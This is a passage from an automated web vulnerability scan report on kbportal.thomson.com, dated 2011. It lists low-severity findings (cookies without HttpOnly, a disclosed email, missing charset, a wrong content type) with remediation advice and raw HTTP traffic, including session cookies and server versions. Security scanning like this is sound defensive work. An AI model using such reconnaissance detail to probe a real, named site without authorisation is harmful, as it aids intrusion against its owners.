User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; c_m2=1; c=undefined571419undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_ppv=0; s_sq=%5B%5BB%5D%5D; IWICategory=IWICategory=21; ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; LangCode=en-US; LangId=1; PortalSettings=cpId~21|ClientId~12|DisplayMode~2|AutoComplete~True|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/20/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; BIGipServerKB-80=428295335.20480.0000

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 20:04:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /display/2/tab.aspx?t=&aid=&cat=&catURL=&r=0.8401849
Set-Cookie: IWICategory=IWICategory=21; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: knowledgebase=cookie_username=; expires=Fri, 26-Apr-1991 05:00:00 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 185

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='/display/2/tab.aspx?t=&amp;aid=&amp;cat=&amp;catURL=&amp;r=0.8401849'>here</a>.</h2>
</body></html>

3.5. http://kbportal.thomson.com/index.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /index.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.aspx?t=&article=&c=12&cid=21&cpc=mCUbki05i2q2gM801Slr08SHaX285EO45&cat=&catURL= HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; LangCode=en-US; LangId=1; BIGipServerKB-80=428295335.20480.0000; PortalSettings=cpId~88|ClientId~12|DisplayMode~2|AutoComplete~False|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~B3B3BA|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/BuiltIn/Default/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; c_m2=1; c=undefined572000undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%2C%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%5D; gpv_pn=support%3Acontact-us%3Adefault; s_ppv=49; s_cc=true; s_sq=; IWICategory=IWICategory=21

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:36:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
P3P: CP=CAO, PSA, OUR
Set-Cookie: IWICategory=IWICategory=21; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: LangCode=en-US; expires=Thu, 26-May-2011 20:36:08 GMT; path=/
Set-Cookie: LangId=1; expires=Thu, 26-May-2011 20:36:08 GMT; path=/
Cache-Control: private
Content-Length: 0


4. Email addresses disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /js/autoComplete.js

Issue detail

The following email address was disclosed in the response:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

Request

GET /js/autoComplete.js HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://kbportal.thomson.com/display/2/search.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c=undefined571419undefined; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; LangCode=en-US; LangId=1; PortalSettings=cpId~21|ClientId~12|DisplayMode~2|AutoComplete~True|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/20/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; BIGipServerKB-80=428295335.20480.0000; s_cc=true; c_m2=1; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Shipping%20Information; s_sq=%5B%5BB%5D%5D; s_ppv=100; IWICategory=IWICategory=

Response

HTTP/1.1 200 OK
Content-Length: 30863
Content-Type: application/x-javascript
Last-Modified: Fri, 19 Jun 2009 02:38:36 GMT
Accept-Ranges: bytes
ETag: "05e71b87f0c91:268"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 20:04:46 GMT

/* Auto-suggest/auto-complete control
*
* original code:
* (C) 2004-2005 zichun

* fixes and heavy modifications:
* (C) 2007 Dmitriy Khudorozhkov (kh_dmitry2001@mail.ru) and contributors.

* Customized by Geoffrey J. Swenson to use external styles, remove code bloat.
* (C) 2008 Talisma / nGenera Corporation.

* This software is provided "as-is", without any e
...[SNIP]...

5. HTML does not specify charset  previous  next
There are 4 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


5.1. http://kbportal.thomson.com/display/2/_dividerFrame.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /display/2/_dividerFrame.html

Request

GET /display/2/_dividerFrame.html HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://kbportal.thomson.com/display/2/index.aspx?tab=browse&c=&cpc=&cid=&cat=&catURL=&r=0.8218797
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c=undefined571419undefined; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; LangCode=en-US; LangId=1; PortalSettings=cpId~21|ClientId~12|DisplayMode~2|AutoComplete~True|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/20/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; BIGipServerKB-80=428295335.20480.0000; s_cc=true; c_m2=1; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Shipping%20Information; s_sq=%5B%5BB%5D%5D; s_ppv=100; IWICategory=IWICategory=

Response

HTTP/1.1 200 OK
Content-Length: 285
Content-Type: text/html
Last-Modified: Fri, 19 Jun 2009 02:38:32 GMT
Accept-Ranges: bytes
ETag: "04f987f0c91:268"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 20:04:42 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <title></title>
</head>
<body class="NoPad bgColor3">
   <script src="/js/default.js" type="text/javascript"></script>
...[SNIP]...

5.2. http://kbportal.thomson.com/display/2/leftframe_files/_greybar.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /display/2/leftframe_files/_greybar.html

Request

GET /display/2/leftframe_files/_greybar.html HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://kbportal.thomson.com/display/2/_leftframe.aspx?tab=browse&searchstring=&searchtype=&searchby=&cat=&catURL=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c=undefined571419undefined; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; LangCode=en-US; LangId=1; PortalSettings=cpId~21|ClientId~12|DisplayMode~2|AutoComplete~True|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/20/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; BIGipServerKB-80=428295335.20480.0000; s_cc=true; c_m2=1; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Shipping%20Information; s_sq=%5B%5BB%5D%5D; s_ppv=100; IWICategory=IWICategory=

Response

HTTP/1.1 200 OK
Content-Length: 2332
Content-Type: text/html
Last-Modified: Thu, 19 Nov 2009 09:29:54 GMT
Accept-Ranges: bytes
ETag: "015e1d9fa68ca1:268"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 20:05:11 GMT

<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!------------------------------
...[SNIP]...

5.3. http://kbportal.thomson.com/pc/12/categoryList/21/2/cat_index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /pc/12/categoryList/21/2/cat_index.html

Request

GET /pc/12/categoryList/21/2/cat_index.html?r=0.8968658 HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://kbportal.thomson.com/display/2/_leftframe.aspx?tab=browse&searchstring=&searchtype=&searchby=&cat=&catURL=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c=undefined571419undefined; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; LangCode=en-US; LangId=1; PortalSettings=cpId~21|ClientId~12|DisplayMode~2|AutoComplete~True|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/20/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; BIGipServerKB-80=428295335.20480.0000; s_cc=true; c_m2=1; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Shipping%20Information; s_sq=%5B%5BB%5D%5D; s_ppv=100; IWICategory=IWICategory=

Response

HTTP/1.1 200 OK
Content-Length: 1971
Content-Type: text/html
Last-Modified: Tue, 26 Apr 2011 20:05:11 GMT
Accept-Ranges: bytes
ETag: W/"8e958c3f4d4cc1:268"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 20:05:11 GMT

...<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<META NAME="Con
...[SNIP]...

5.4. http://kbportal.thomson.com/pc/12/categoryList/88/2/cat_index.html  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /pc/12/categoryList/88/2/cat_index.html

Request

GET /pc/12/categoryList/88/2/cat_index.html?r=0.6665606 HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://kbportal.thomson.com/display/2/_leftframe.aspx?tab=search&searchstring=&searchtype=&searchby=&cat=&catURL=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; c_m2=1; c=undefined571419burp; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849781175%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849784869%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303850887310%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_sq=%5B%5BB%5D%5D; s_ppv=100; ASP.NET_SessionId=wmip5h2o1slpk445xan1ev45; BIGipServerKB-80=2240234663.20480.0000; LangCode=en-US; LangId=1; PortalSettings=cpId~88|ClientId~12|DisplayMode~2|AutoComplete~True|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~B3B3BA|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/BuiltIn/Default/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; IWICategory=IWICategory=

Response

HTTP/1.1 200 OK
Content-Length: 1000
Content-Type: text/html
Last-Modified: Tue, 26 Apr 2011 20:51:31 GMT
Accept-Ranges: bytes
ETag: W/"44aaf7b8534cc1:28d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 20:51:33 GMT

...<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<META NAME="Con
...[SNIP]...

6. Content type incorrectly stated  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://kbportal.thomson.com
Path:   /display/2/homepage.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /display/2/homepage.aspx HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://kbportal.thomson.com/display/2/_midframe.aspx?tab=search&aid=&searchstring=&searchtype=&searchby=&alp=&search=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; c_m2=1; c=undefined571419burp; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849781175%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849784869%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303850887310%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_sq=%5B%5BB%5D%5D; s_ppv=100; ASP.NET_SessionId=wmip5h2o1slpk445xan1ev45; BIGipServerKB-80=2240234663.20480.0000; LangCode=en-US; LangId=1; PortalSettings=cpId~88|ClientId~12|DisplayMode~2|AutoComplete~True|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~B3B3BA|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/BuiltIn/Default/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; IWICategory=IWICategory=

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:51:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Length: 270

<font size="2" face="Verdana">
<p>We are sorry, however you have reached our default knowledgebase in error.</P>
<br>
<p>Please try your link again or contact your product team to help you with the
...[SNIP]...

Report generated by XSS.CX at Tue Apr 26 15:53:17 CDT 2011.